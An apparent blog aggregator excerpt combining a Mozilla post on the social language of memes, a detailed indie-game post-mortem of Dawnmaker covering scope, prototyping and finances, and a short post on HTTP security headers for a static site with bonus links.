Nowadays, memes have grown into the mainstream, many making it outside of their original subculture to become widely culturally relevant. And the faces behind some popular memes have gained celebrity status even offline. Case in point: In early November 2024, the people beyond three iconic memes of the 2010s met up, causing an internet uproar. 

There’s a meme out there for every facet of your identity and every interest you hold, from a corporate job to a keen interest in birdwatching to crossovers between Pokémon and Thomas the Tank Engine. When multiple specific interests collide in a meme… well there’s a reason the phrase “I’ve never had an original thought or experience” became so popular online.

That’s not even touching the surface of the weird, wild and wonderful world of niche memes. And that is exactly where the hyper-specific meme shines in its ability to broker connections. If you can parse through the layers of meaning and referential humor, then you’re part of the exclusive club of people in the know. 

Today, we can be defined by the media we consume, so understanding a meme, especially if it’s highly intertextual and referential, gives insight into who a person is and what corners of the internet they inhabit. Memes serve as inside jokes for subcommunities online, and the more iterations and riffs on the joke, the higher barrier to entry for outsiders, further cementing the group’s identity. If you understand a niche meme, you come to realize you’re part of a very specific collective of internet users, for better or for worse.

A meme is a digital manifestation of a shared online experience and interaction. They have set structures and social dynamics, and by intertextually referencing various pop culture tokens, they show affiliation and affinity to specific internet subgroups. They subtly ask if you understand, and if you do (and iykyk), you’re initiated into the club as “one of us, one of us!” Memes are not random. They’re created to appeal to a specific chosen audience who will then hopefully pass on the meme like a contagion of amusement because they identify with it. 

We share memes because we assume our audience, upon wading through the subtext, will find them worthwhile, whether because of humor or in-group membership. Whether posting into the void that is Tumblr or 4chan or Reddit, or sending memes directly to your friends or family in a form of digital pebbling — like penguins presenting smooth stones to their prospective mates in courtship rituals — spreading these internet cultural tokens is a bid for social connection. And through that connection, we show affiliation with others who understand the digital inside joke that is a shared piece of popular culture. Memes are cultural artifacts and efficient forms of communication to those who understand the context. And oftentimes they’re funny, which is just an added bonus. Put simply, humans crave connection, and memes just do it for us. 

Get Firefox

Get the browser that protects what’s important

The post IYKYK: The secret language of memes appeared first on The Mozilla Blog.

Adrian Gaudebert3 years of intense learning - The Dawnmaker Post-mortem

It's been 3 years since I started working on Dawnmaker full-time with Alexis. The creation of our first commercial game coincided with the creation of Arpentor Studio, our company. I've shared a lot of insights along the way on this blog, from how we made our first market research (which was incredibly wrong) to how much we made with our game (look at the difference between the two, it's… interesting). I wrote a pretty big piece were I explained how we built Arpentor Studio. I wrote a dozen smaller posts about the development of Dawnmaker. And I shared a bunch of my feelings, mistakes and successes in my yearly State of the Adrian posts (in French only, sorry).

But today, I want to take a step back and give a good look at these last 3 years. It's time for the Dawnmaker post-mortem, where I'm going to share what I believe we did well, what we did wrong, and what I've learned along the way. Because Dawnmaker and Arpentor Studio are so intertwined, I'm inevitably going to talk about the studio as well, but I think it makes sense. Let's get started!

What we did

Let's get some context first. Dawnmaker is a solo strategy game, mixing city building and deckbuilding to create a board game-like experience. It was released in July 2024 on Steam and itch.io. The team consisted of 2 full-time people, with occasional help from freelancers. My associate Alexis took care of everything related to graphics, and I did the programming and game design of the game. If you're interested in how much the game sold, I wrote a blog post about this: 18 days of selling Dawnmaker.

Dawnmaker capsule

I created the very first prototype of what would become Dawnmaker back in the summer of 2021, but we only started working on the game full-time in December of that year. We joined a local incubator in 2022, which kind of shook our plans: we spent a significant portion of our time working on administrative things around the game, like making pitch decks and funding briefs. We had to create a company earlier than we had planned to ask for public funding. So in 2022 we only spent about half our time actually working on developing the game. In 2023, after having been rejected our main source of funding, we shrunk down our ambitions and focused on just making the game. We still spent time to improve our pitch deck and contacted some publishers, but never managed to secure a deal. In early 2024, we decided to self-publish, started our Steam page and worked on promoting the game while polishing what we had.

Because we never found a publisher, we never had the money to do the production phase of Dawnmaker. That means the game shipped with about half the content we wanted it to have. Here are my definitions of the different phases of a game project, as I'll refer to them later on in this article:

  1. Ideation — The phase where we are defining the key concepts of the game we want to make. There's some early prototyping there, as well as research. The goal is to have a clear picture of what we want to build.
  2. Pre-production — The phase where we validate what the core of the game is, that it is fun, and that we will be able to actually deliver it. It can be cut down into three steps: prototyping, pre-production and vertical slice. In prototyping we validate the vision of the game. In pre-production (yes, it's the same name as the phase, but that's what I was taught) we build our production pipeline. During the vertical slice, we validate that the pipeline works and finalize the main systems of the game.
  3. Production — The phase where we build the content of the game. This phase is supposed to be one that can be planned very precisely, because the pre-production has supposedly removed almost all the unknowns.
  4. Post-production — The phase where we polish our game and take it through the finish line.

Now that you have some context, let's get into the meat of this article!

What we did right

Let's start this post-mortem on a positive note, and list the things that I believe we did well. First and foremost, we actually shipped a game! Each game that comes out is a little miracle, and we succeeded there. We kept our vision, we pushed it as far as we could, and we did not give up. Bravo us!

Good game quality

What's more, our game has been very well received: at the time of writing, we have a 93% positive review ratio on Steam, from 103 reviews. I am of course stoked that Dawnmaker was liked by that many reviewers. I think there are 3 main reasons why we had such positive reviews (other than the game being decently fun, of course):

  1. We kept a demo up at all times, even after the release, meaning that tentative customers could give it a try before buying. If they didn't like the demo, they didn't buy the game — not good for us — but then they were not disappointed by a product they bought — good for them and for our reviews!
  2. We were speaking to a very small niche, but provided something that was good for them. The niche is a weird intersection of deckbuilding, city building and board game fans. It was incredibly difficult to find and talk to, probably because it is, as I said, very small, but we made something that worked very well for those players.
  3. We under-priced the game aggressively (at $9.99) to lower the players' expectations. That actually transpired in the reviews, where a few people mentioned that the game had flaws, but they tolerated them because of the price tag. (Note: the game has since been moved up to a $14.99 price point by our new publisher.)

Of course, had the game been bad, we would not have had those reviews at all. So it goes to say that Dawnmaker is a fine game. For all its flaws, it is fun to play. I've played it a lot — as I guess do all game creators with their creation — and it took me a while to get bored with it. The median playtime on Steam is 3 hours and 23 minutes, with an average playtime of 8 hours and 17 minutes. Here's a stat that blows my mind: at the time of writing, 175 people (about 10% of our players) have played Dawnmaker for more than 20 hours. At least 15 people played it for more than 50 hours. I know this is far from the life-devouring monsters that are out there, like Civilization, Skyrim, Minecraft or GTA, but for our humble game and for me, that's incredible to think about.

So, we made a fun game. I think we succeeded there by just spending a lot of time in pre-production. Truth be told, we spent about 2 years in that phase, only 6 months in post-production, and we did not really do a real production phase. For 2 years, we were testing the game and making deep changes to its core, iterating until we found the best version of this game we could. Mind you, 2 years was way too long a time, and I'll get back to that in the failures section. But I believe the reason why Dawnmaker was enjoyed by our players is because we took that time to improve it.

Lesson learned

Make good games?

The art of the game was also well received, and here again I think time was the key factor. It took a long time to land on the final art direction. There was a point where the game had a 3D board, and it was… not good. I think one of our major successes, from a production point of view, was to pivot into a 2D board. That simplified a lot of things in terms of programming, of performance, and made us land on that much, much better art style. It took a long time but we got there.

Screenshot of the first prototype of Dawnmaker <figcaption>The first prototype of Dawnmaker, which had sound for some reason…</figcaption>

There's one last aspect that I think mattered in the success of the game, and for which I am particularly proud: the game had very few bugs upon release, and none were blocking. I've achieved that by prioritizing bug fixing at all times during the development of the game. I consider that at any point in time, and with very few exceptions, fixing a known bug is higher priority than anything else. Of course this is easier done when there is a single programmer, who knows the entire code base, but I'm convinced that, if you want to ship bug-free products, bug fixing must not be an afterthought, a thing that you do in post-production. If you keep a bug-free game at all times during development, chances are very high that you'll ship a bug-free game!

Lesson learned

Keeping track of bugs and fixing them as early as possible makes your life easier when you're nearing release, because you don't have to spend time chasing bugs in code that you wrote months or years before. Always reserve time for bug fixing in your planning!

Custom tooling

Speaking of programming, a noticeable part of my time was spent creating a custom tool to handle the game's data. Because we're using a custom tech stack, and not a generic game engine, we did not have access to pre-made tooling. But, since I was in control of the full code of the game, I have been able to create a tool that I'm very happy with.

First a little bit of context: Dawnmaker is coded with Web technologies. What it means is that it's essentially a website, or more specifically, a web app. Dawnmaker runs in a browser. Heck, for most of the development of the game, we did our playtests in browsers! That was super convenient: you want someone to test your game? They can open their favorite browser to the URL of the game, and tada, they can play! No need to download or install anything, no need to worry about updates, they always have the latest version of the game there.

Because our game is web-based, I was able to create a content editor, also web-based, that could run the game. So we have this editor that is a convenient way to edit a database, where all the data about Dawnmaker sits. The cool thing is that, when one of us would make a change to the data, we could click a button right there in the editor, and immediately start playing the game with the changes we just made. No need to download data, build locally, or such cumbersome steps. One click, and you're in the game, with all the debug tools and conveniences you need. Another click, and you're back to the editor, ready to make further changes.

Screenshot of the Dawnmaker content editor <figcaption>Screenshot of the Dawnmaker content editor</figcaption>

That tool evolved over time to also handle the graphical assets related to our buildings. Alexis was able to upload, for each building, its illustration and all the elements composing its tile. I added a spritesheet system that could be used in buildings as animations, with controls to order layers, scale and position elements, and even change the tint of sprites.

Lesson learned

Tooling is an investment that can pay double: it makes you and your team go faster, and can be reused in future projects. Do not make tools for the sake of making tools of course. Do it only when you know that it will save you time in the end. But if you're smart about it, it can really pay off in the long run.

Long-term company strategy

There's one last thing I believe we did well, that I want to discuss, and it's related to our company strategy. Very early on in the creation of Arpentor Studio, we thought about our long-term strategy: what does our road to success look like? Where do we want to be in 5 to 10 years? Our answer was that we wanted to be known for making strategy games (sorry, lots of strategies in this paragraph) that were deep, both in mechanics and meaning. The end game would be to be able to realistically be making my dream competitive card game — something akin to Magic: the Gathering, Hearthstone or Legends of Runeterra.

What we did well is that we did not start by the end, but instead drafted a plan to gather experience, knowledge and money, to put ourselves in a place where we would be confident about launching such an ambitious project. We aimed to start by making a solo game, to avoid the huge complexities of handling multiplayer. We aimed to make a simple strategy game, too, but there we missed our goal, for the game we made was way too original and complex. But still, we managed to stay on track: no multiplayer, simple 2D (even though we went 3D for half a year), and mechanics that were not as heavy as they could have been.

We failed on the execution of the plan, and I'll expand on that later in this post, but we did take the time to make a plan and that's a big success in my opinion.

Lesson learned

Keep things as simple as possible for your first games! We humans have a tendency to make things more complex as we go, increasing the scope, adding cool features and so on. That can be a real problem down the line if you're trying to build a sustainable business. Set yourself some hard constraints early on (for example, no 3D, no narration, no NPCs, etc. ) and keep to them to make sure you can finish your game in a timely manner.

What we did wrong

It's good to recognize your successes, so that you can repeat them, but it's even more important to take a good look at your failures, so that you can avoid repeating them. We made a lot of mistakes over these past 3 years, both related to Dawnmaker and to Arpentor Studio. I'll start by focusing on the game's production, then move on to the game itself to finally discuss company-related mistakes.

Production mistakes

Scope creep aka "the Nemesis of Game Devs"

The scope of Dawnmaker exploded during its development. It was initially supposed to be a game that we wanted to make in about a year. We ended up working on it for more than two years and a half instead! There are several reasons why the scope got so out-of-control.

Screenshot of Dawnmaker, July 2022 <figcaption>Dawnmaker in July 2022 — called "Cities of Heksiga" at the time</figcaption>

The first reason is that we were not strict enough in setting deadlines and respecting them. During our (long) preproduction phase, we would work on an iteration of the game, then test it, then realize that it wasn't as good as we wanted it to be, and thus start another iteration. We did this for… a year and a half? Of course, working on a game instead of smaller prototypes didn't help in reaching the right conclusions faster. But we also failed in having a long-term planning, with hard dates for key milestones of the game's development. We were thinking that it was fine, that the game would be better if we spent more time on it. That is definitely true. What we did not account for was that it would not sell significantly better by working more. I'll get back to that when discussing the company strategy.

Lesson learned

Setting deadlines and respecting them is one of the key abilities to master for shipping games and making money with them. Create a budget and assign delivery dates to key milestones. Revisit these often, to make sure you're on track. If not, you need to reassess your situation as soon as possible. Cut the scope of your work or extend your deadlines, but make sure you adapt the budget and that you have a good understanding of the consequences of making those changes.

The second reason the scope exploded is that we were lured into thinking that getting money was easy, especially public funding, and that we should ask for as much money as we could. To do that, we had to increase the scope of what we were presenting, in the hope that we would receive big money, which would enable other sources of money, and allow us to make a bigger game. The problem we faced was that we shifted our actual work to that new plan, that bigger scope, long before we knew if we would get the money or not. And so instead of working on a 1-year production, insidiously we found ourselves working on a 2 to 3-year production. And then of course, we did not get the money we asked for, and were on a track that required a few hundred thousands of euros to fund, with just our personal savings to do it.

I think the trick here is to have two different plans for two different games. Their core is the same, but one is the game that you can realistically make without any sort of funding, and the other is what you could do if you were to receive the money. But, we should never start working on the "dream" game until the money is on our bank account. I think that's a terribly difficult thing to do — at least it was for me — and a big trap of starting a game production that relies on external funding.

Lesson learned

Never spend money you do not have. Never start down a path until you're sure you will be able to execute it entirely.

The third reason why the scope got out of control is a bit of a consequence of the first two: we saw our game bigger than it ended up being, and did not focus enough on the strength of our core gameplay. We were convinced that we needed to have a meta-progression, a game outside the game, and struggled a lot to figure out what that should be. And as I discussed in the previous section, I think we failed to do it: our meta-progression is too shallow and doesn't improve the core of the game.

Looking back, I remember conversations we had were we justified the need for this work with the scope of the game, with the price we wanted to sell the game for, and thus with the expectations of our future players. The reasoning was, this is a $20 game, players will expect a lot of replayability, so we need to have a meta-progression that would enable it. I think that was a valid line of thought, if only we were actually making a $20 game. In the end, Dawnmaker was sold for $10. Had we realigned earlier, had we taken a real step back after we realized that we were not getting any significant funding, maybe we would have seen this. For a $10 game, we did not need such a complex meta-progression system. We could have focused more on developing the core of the game, building more content and gameplay systems, and landed on a much simpler progression.

Lesson learned

Things change during the lifetime of a game. Take a step back regularly to ask yourself if the assumptions you made earlier are still valid today.

Prototyping the wrong way

I mentioned earlier that we spent a lot of time in preproduction, working on finding the best version of the core gameplay of our game. I said it was a good thing, but it's also a bad one because it took us way too long to find it. And the reason is simple: we did prototyping wrong.

Screenshot of Dawnmaker, January 2023 <figcaption>Dawnmaker in January 2023</figcaption>

The goal of prototyping is to answer one or a few questions as fast as possible. In order to do that, you need to focus on building just what you need to answer your question, and nothing else. If you start putting actual art in your gameplay prototype, or gameplay in your art prototype, then you're not making a prototype: you're making a game. That's what we did. Too early we started working on adding art to our gameplay prototype. Our first recorded prototype, which we did in Godot, had some art in it. Basic one, sure, but art anyway. The time it took to integrate the art into that prototype is time that was not spent answering the main question the prototype was supposed to answer — at that time: was the core gameplay loop fun?

It might seem inconsequential in a small prototype, but that cost quickly adds up. You're not as agile as you would be if you focused on only one thing. You're solving issues related to your assets instead of focusing on gameplay. And then you're a bit disappointed because it doesn't look too great so you start spending time improving the art. Really quickly you end up building a small game, instead of building a small prototype. Our first prototype even had sound! What the hell? Why did we put sound in a prototype that was crap, and was meant to help us figure out that the gameplay was crap?

Lesson learned

Make your prototypes as small and as focused as possible. Do not mix gameplay and art prototypes. Make sure each prototype answers one question. Prototype as many things as possible before moving on to preproduction.

Not playing to our strengths

I mentioned earlier that we had a 3D board in the game for a few months. Going 3D was a mistake that cost us a lot of time, because I had to program the whole thing, in an environment that had little tools and conveniences — we were not using an engine like Godot or Unity. And I was not good at 3D, I had never worked on a 3D game before, so I had a learn a lot in order to do something functional. The end result was something that worked, but wasn't very pleasant to look at. It had performance issues on my computer, it had bugs that I had no clue how to debug. We ended up ditching the whole 3D board after a lot of discussions and conflicts. The ultimate nail in the coffin came from a publisher who had been shown the game, and who asked: "what is the added value of 3D for this game?" Being unable to give a satisfying answer, we moved back to a 2D board, and were much better for it.

Screenshot of Dawnmaker with a 3D board <figcaption>Dawnmaker in June 2023, with a 3D board</figcaption>

So my question is: why did we go 3D for that period of time? I think there were two reasons working together to send us in that trap. The first one is that we did not assess our strengths and weaknesses enough. Alexis's strength was making 3D art, while I had no experience in implementing 3D in a game, and we knew it, but we did not weight those enough. The second reason is that we did not know enough about our tools to figure out that we could find a good compromise. See, we thought that we could either go 3D and build everything in 3D, from building models in blender to integrating on a 3D board in the game, or we could go 2D, which would simplify my work but would force Alexis to draw sprites by hand.

What we figured out later on was that there were tools that allowed Alexis to work in 3D, creating models and animations in blender, but export everything for a 2D environment very easily. There was a way to have the best of both worlds, exploiting our strengths without requiring us to learn something new and complex — which we definitely did not want to do for our first commercial game. Our mistake was to not take the time to research that, to find that compromise.

Lesson learned

Research the tools at your disposal, and always look for the most efficient way to do things. Play to the strengths of your team, especially for your first games.

Building a vertical slice instead of a horizontal one

We struggled a lot to figure out what our vertical slice should be. How could we prove that our game was viable to a potential investor? That's what the vertical slice is supposed to do, by providing a "slice" of your game that is representative of the final product you intend to build. It's supposed to have a small subset of your content, like a level, with a very high level of polish. How do you do that for a game that is systemic in nature? How do you build the equivalent of a "level" of a game like Dawnmaker?

We did not find a proper answer to this question. We were constantly juggling priorities between adding systems, because we needed to prove that the game worked and was fun, and adding signs, feedback and juice, because we believed we had to show what the final product would look and feel like. We were basically building the entire game, instead of just a slice of it. This was in part because we had basically no credentials to our name, as Dawnmaker was our first real game, and feared publishers would have trouble trusting that we would be able to execute the "icing" part of the game. I still think that's a real problem, and the only solution that I see is to not try to go for funding for your first games. But I'll talk more about that in the Company strategy section below.

Screenshot of Dawnmaker, November 2023 <figcaption>Dawnmaker in November 2023</figcaption>

However, I recently came across the concept of horizontal slice, as opposed to the vertical slice, and that blew my mind. The idea is, instead of building a small piece of your game with final quality, to build almost all of the base layers of the game. So, you would build all the systems, a good chunk of the content, everything that is required to show that the gameplay works and is fun. Without working on the game's feel, its signs and feedback, a tutorial, and so. No icing on the cake, just the meat of it. (Meat in a cake? Yeah, that sounds weird. Or British, I don't know.) The goal of the horizontal slice is to prove that the game as a whole works, that all the systems fit together in harmony, and that the game is fun.

I believe that this is a much better model for a game like Dawnmaker. A game like Mario is fun because it has great controls, pretty assets and funny situations. That's what you prove with a vertical slice. But take a game like Balatro. It is fun because it has reached a balance between all the systems, because it has enough depth to provide a nearly-endless replayability. Controls, feedback and juice are still important of course, but they are not the core of the game, and thus when building such a game, one should not focus on those aspects, but on the systems. We should have done the same with Dawnmaker, and I'll be aiming for a horizontal slice with my next strategy game for sure.

Lesson learned

Different types of games require different processes. Find the process that best serves the development of yours. If you're making some sort of systemic game, maybe building a horizontal slice is a better tool than going for the commonly used vertical slice?

Game weaknesses

Let's now talk about the game itself. Dawnmaker received really good reviews, but I still believe it is lacking in many ways. There are many problems with the gameplay: it lacks some form of adjustable difficulty, to make it a better challenge for a bigger range of players. It lacks a more rewarding and engaging meta-progression. And of course it lacks content, as we never actually did our production phase.

Weak meta-progression

As I wrote earlier, I am very happy about the core loop of Dawnmaker. However, I think we failed big with its meta-progression. We decided to make it a roguelike, meaning that there is no progression between runs. You always start a run from the same state. Many players disliked that, and I now understand why, and why roguelites have gained in popularity a lot.

I recently read an article by Chris Zukowski where he discusses the kind of difficulty that Steam players like. I agree with his analysis and his concept of the "Easy-Hard-Easy (but variable)" difficulty, as I think that's part of a lot of the big successes on Steam these last few years. To summarize (read the article for more details), players like to have an easy micro-loop (the core actions of the game, what you do during one turn), a hard macro-loop (the medium-term goals, in our case, getting enough Eclairium to level up before running out of Luminoil), and on top of that, a meta-progression that they have a lot of control over, and that allows them to adjust the difficulty of the challenge. An example I like a lot is Hades and its Mirror of Night: playing the game is easy, controls are great, but winning a run is very hard. However, by choosing to grind darkness and using it to unlock certain upgrades in the mirror, you get to make the challenge a lot easier. But someone else might decide to not grind darkness, or not spend, and play with a much greater challenge. The player has a lot of control over the difficulty of the game.

Screenshot of Dawnmaker's world map <figcaption>Dawnmaker's world map</figcaption>

I think this is the biggest miss of Dawnmaker in terms of gameplay. Players cannot adjust the difficulty of the game to their tastes, which has been frustrating for a lot of them. Some complained it was way too hard while others have found the game too easy and would have enjoyed more challenge. All of them would have enjoyed the game a lot more had they had a way to control the challenge one way or another. Our mistake was to have some progression inside a run, but not outside. A player can grow stronger during a run, improving their decks or starting resources, but when they lose a run they have to start from scratch again. A player who struggles with the challenge has no way to smooth the difficulty, they have to work and learn how to play better. The "git gud" philosophy might work in some genres, but evidently it didn't fit with the audience of Dawnmaker.

This is not something that would have been easy to add though. I think it's something that needs to be thought about quite early in the process, as it impacts the core gameplay a lot. We tried to add meta-progression to our game too late in the process, and that's a reason we failed: it was too difficult to add good progression without impacting the careful balance of the core gameplay, and having to profoundly rework it.

Lesson learned

Offering an adaptative challenge is important for Steam players, and meta-progression is a good tool to do that. But it needs to be anticipated relatively early, as it is tightly tied to your core gameplay.

Lack of a strong fantasy

I believe the biggest cause for Dawnmaker's financial failure is that it lacks a strong fantasy. That gave us a lot of trouble, mostly in trying to sell the game to players. Presenting it as a "city building meets deckbuilding" is not a fantasy, it's genres. We tried to put forth the "combo" gameplay, telling that cards and buildings combine to create powerful effects, but as I just wrote, that's gameplay and not a fantasy. Our fantasy was to "bring life back to a dead world", but that's not nearly strong enough: it's not surprising nor exciting.

Screenshot of Dawnmaker, February 2024 <figcaption>Dawnmaker in February 2024</figcaption>

In hindsight, I believe we missed a huge opportunity in making the zeppelin our main fantasy. It's something that's not often seen in games, it's a great figure for the ambiance of the game, and I think it would have helped create a better meta-progression. We have an "Airship" view in the game, where players can improve their starting state for the next region they're going to explore, but it's a very basic UI. There was potential to make something more exciting there.

The reason for this failure is that we started this project with mechanics and not with the fantasy. We spent a long time figuring out what our core gameplay would be, testing it until it was fun. And only then did we ask ourselves what the fantasy should be. It turns out that putting a fantasy and a theme on top of gameplay is not easy. I don't mean to say it's impossible, some have successfully done it, but I believe it is much harder than starting with an exciting fantasy and building gameplay on top of it.

Lesson learned

Marketing starts day 1 of the creation of a game. The 2 key elements that sell your game are the genre(s) of the game, and its fantasy or hook. Do not neglect those if you want to make money with your game.

This mistake was in part caused by me being focused primarily on mechanics as a game designer. I often start a project with a gameplay idea, a gimmick or a genre, but rarely with a theme, emotion or fantasy. It's not a problem to start with mechanics, of course. But the fantasy is what sells the game. My goal for my next games, as a designer, is to work on finding a strong fantasy that fits my mechanics much earlier in the process, and build on it instead of trying to shove it into an advanced core loop.

Company strategy

Oooo boy did we make mistakes on a company level. By that I mean, with managing our money. We messed up pretty bad — though seeing stories that pop up regularly on some gamedev subreddits, it could have been way worse. Doesn't mean there aren't lessons to be learned here, so let's dive in!

Hiring too soon, too quick

Managing money is difficult! Or at least, we've not been very good at it. We made the mistake of spending money at the wrong time or for the wrong things several times. That mainly happened because we had too much trust in the future, in the fact that we would find money easily, either by selling our game or by getting public money or investors. If we did get some public funding, that was not nearly enough to cover what we spent, and so Dawnmaker was mostly paid for by our personal savings.

The biggest misplacement of money we made was to poorly hire people. We made two different mistakes here: on one occasion, we hired someone without properly testing that person and making sure they would fit our team and project. On the other, we hired someone only to realize when they started that we did not have work to give them, because we were way too early in the game's development. Both recruitments ended up costing us a significant amount of money while bring very little value to the game or the company.

But those failed recruitments had another bad consequence: we hurt people in the process. Our inexperience has been a source of pain for human beings who chose to trust us. That is a terrible feeling for me. I don't know what more to write about this, other than I think I've learned and I hope I won't be hurting others in the future. I'll do my best anyway.

Lesson learned

Hiring is freaking hard. Do not rush it. It's better to not hire than to hire the wrong person.

Too much investment into our first game

I've talked about it already in previous sections, but the biggest strategic mistake on Dawnmaker was to spend so much time on it. Making games is hard, making games that sell is even harder, and there's an incredible amount of luck involved there. Of course, the better your game, the higher your chances. But making good games requires experience. Investing 2.5 years into our first commercial game was way too risky: the more time we spent on the game, the more money it needed to make out, and I don't believe a game's revenue scales with the time invested in it.

Side note: we made a game before Dawnmaker, called Phytomancer — it's available on itch.io for 3€ — but because it had no commercial ambition, I don't think it counts much on the key areas of making games that sell.

Here are facts:

Dawnmaker vertical capsule

  • Dawnmaker cost us about 320k€ to make — read my in-depth article about Dawnmaker's real cost for more details — and only made us about 8k€ in net revenue. That is a financial catastrophe, only possible because we invested a lot of our time and personal savings, and we benefited from some French social welfare.
  • Most indie studios close after they release their first game. It's unclear what the exact causes are, but from personal experience, I bet it's in big part because those companies invest too much in there first game and have nothing left when it comes to making the second one — either money or energy. We tend to burn cash and ourselves out.
  • And there's an economic context too: investments in games and game companies have slowed down to a trickle the past couple years, and they don't seem to be going back up soon. Games are very expensive to make, and the actors that used to pay for their production (publishers, investors) are not playing that role anymore.

Considering this, I strongly believe that today, investing several years into making your first game is not a valid company strategy. It's engaging in an act of faith. And a business should not run on faith. What pains me is that we knew this when we started Arpentor Studio, and we wanted to make Dawnmaker in about a year. But we lacked the discipline to actually keep that deadline, and we lost ourselves in the process. We got heavily side-tracked by thinking we could get some funding, by growing our scope to ask for more money, etc. We didn't start the project with a clear objective, with a strict deadline. So we kept delaying and delaying. We had the comfort of having decent money reserves. We never thought about what would happen after releasing Dawnmaker, never asked ourselves what our situation would be if the game took 3 years to release and didn't make any money. We should have.

Lesson learned

Start by making small games! Learn, experiment, grow, then go for bigger games when you're in a better position to succeed.

Here are my arguments for making several small games instead of investing too much into a single bigger game. Note that these are targeted to folks trying to create a games studio, to make a business of selling games. If your goal is to create your dream game, or if you're in it for the art but don't care about the money, this likely does not apply to you.

  • By releasing more games, you gain a lot of key experience in the business of making games that sell. You receive more player feedback. You have the opportunity to try more things. You learn the tricks of the platform(s) you're selling on — Steam is hard!
  • By releasing more games, you give yourself more chances to break out, to hit that magic moment when a game finds its audience, because it arrives at the right moment, in the right place. (For more on this, I highly recommend this article by Ryan Rigney: Nobody Knows If Your Game Will Pop Off, where the authors talks about ways of predicting a hit and the correlation between the number of hits and the number of works produced.)
  • By releasing more games, you build yourself a back catalog. Games sell more on their first day, week or month, for sure, but that doesn't mean they stop selling afterwards. Games on Steam keep generating revenue for a long time, even if a small one. And a small revenue is infinitely better than no revenue at all. And small revenues can pile up to make, who knows, a decent revenue?
  • By releasing more games, you grow your audience. Each game is a way to reach new people and bring them to your following — be it through a newsletter, a discord server or your social networks. The bigger your audience, the higher your chances of selling your next game.
  • By releasing more games, you build your credibility as a game developer. When you go to an investor to show them your incredible new idea, you will make a much better impression if you have already released 5 games on Steam. You prove to them that you know how to finish a game.

Keep in mind that making small games is really, really hard. It requires a lot of discipline and planning. This is where we failed: we wanted to make our game in one year, but never planned that time. We never wrote down what our deadline was, never budgeted that year into milestones. If you want to succeed there, you need to accept that your game will not be perfect, or even good. That's fine. The goal is not to make a great game, it's to release a game. However imperfect that game is, the success criteria is not its quality, or its sales numbers. The number one success criteria is that people can buy it.

<figcaption>Dawnmaker's cinematic release trailer</figcaption>

Conclusion

I wanted to end here, because I think this is the most important thing to learn from this post-mortem. If you're trying to build a sustainable game studio, if you're in it for the long run, then please, please start by making small games. Don't gamble on a crazy-big first game. Garner experience. Learn how the market works. Try things in a way that will cost you as little as possible. Build your audience and your credibility. Then, when the time is right, you'll be much better equipped to take on bigger projects. That doesn't mean you will automatically succeed, but your chances will be much, much higher.

As for myself? Well, I'm trying to learn from my own mistakes. My next project will be a much shorter one, with strict deadlines and milestones. I will capitalize on what I made for Dawnmaker, reusing as many tools and wisdom as possible. Trying to make the best possible game with what time, money and resources I have. All I can say for now is that it's going to be a deckbuilding strategy game about an alchemist trying to create the Philosopher's Stone. I will talk about it more on my blog and on Arpentor's newsletter, so I hope you'll follow me into that next adventure!

Subscribe to Arpentor Studio's Newsletter! One email about every other month, no spams, with insights on the development of our games and access to early versions of future projects.

Thanks a lot to Elli for their proofreading of this very long post!

Don Martisecurity headers for a static site

This site now has an OPML version (XML) of the blogroll. What can I do with it? It seems like the old Share your OPML site is no more. Any ideas?

Also went through Securing your static website with HTTP response headers by Matt Hobbs and got a clean bill of health from the Security Headers site. Here’s what I have on here as of today:

Access-Control-Allow-Origin "https://blog.zgp.org/" Cache-Control "max-age=3600" Content-Security-Policy "base-uri 'self'; default-src 'self'; frame-ancestors 'self';" Cross-Origin-Opener-Policy "same-origin" Permissions-Policy "accelerometer=(),autoplay=(),browsing-topics=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),fullscreen=(),geolocation=(),gyroscope=(),magnetometer=(),microphone=(),midi=(),payment=(),picture-in-picture=(),publickey-credentials-get=(),screen-wake-lock=(),sync-xhr=(self),usb=(),web-share=(),xr-spatial-tracking=()" "expr=%{CONTENT_TYPE} =~ m#text\/(html|javascript)|application\/pdf|xml#i" Referrer-Policy no-referrer-when-downgrade Cross-Origin-Resource-Policy same-origin Cross-Origin-Embedder-Policy require-corp Strict-Transport-Security "max-age=2592000" X-Content-Type-Options: nosniff

(update 2 Feb 2025) This site has some pages with inline styles, so I can’t use that CSP line right now.

To allow inline styles:

Content-Security-Policy "base-uri 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'self';" 

This is because I use the SingleFile extension to make mirrored copies of pages, so I need to move those into their own virtual host so I can go back to using the version without the unsafe-inline.

I saved a copy of Back to the Building Blocks: A Path Toward Secure and Measurable Software (PDF). The original seems to have been taken down, but it’s a US Government document so I can keep a copy on here (like the FBI alert that got taken down last year, which I also have a copy of.)

Bonus links

Why is Big Tech hellbent on making AI opt-out? by Richard Speed. Rather than asking we’re going to shovel a load of AI services into your apps that you never asked for, but our investors really need you to use, is this OK? the assumption instead is that users will be delighted to see their formerly pristine applications cluttered with AI features. Customers, however, seem largely dissatisfied. (IMHO if the EU is really going to throw down and do a software trade war with the USA, this is the best time to switch to European Alternatives.
Big-time proprietary software is breaking compatibility while independent alternatives keep on going. People lined up for Microsoft Windows 95 in 1995 and Apple iPhones in 2007, and a trade war with the USA would have been a problem for software users then, but now the EuroStack is a thing. The China stack, too, as Prof. Yu Zhou points out: China tech shrugged off Trump’s ‘trade war’ − there’s no reason it won’t do the same with new tariffs. I updated generative ai antimoats with some recent links. Even if the AI boom does catch on among users, services that use AI are more likely to use predictable independently-hosted models than to rely on Big Tech APIs that can be EOLed or nerfed at any time, or just have the price increased.)

California vs Texas Minimum Wage, 2013-2024 by Barry Ritholtz. [F]or seven years–from January 2013 to March 2020–[California and Texas quick-service restaurant] employment moved almost identically, the correlation between them 0.994. During that seven year period, however, TX had a flat $7.25/hr minimum wage while CA increased its minimum wage by 50%, from $8/hr to $12. Related: Is a Big Mac in Denmark Pricier Than in US?

What’s happening on RedNote? A media scholar explains the app TikTok users are fleeing to – and the cultural moment unfolding there Jianqing Chen covers the Xiaohongshu boom in the USA. This spontaneous convergence recalls the internet’s original dream of a global village. It’s a glimmer of hope for connection and communication in a divided world. (This is such authentic organic social that the Xiaohongshu ToS hasn’t even been translated into English yet. And not only does nobody read privacy policies (we knew that) but videos about reuniting with your Chinese spy from TikTok are a whole trend on there. One marketing company put up a page of Rules & Community Guidelines translated into English but I haven’t cross-checked it. Practice the core socialist values. and Promote scientific thinking and popularize scientific knowledge.)

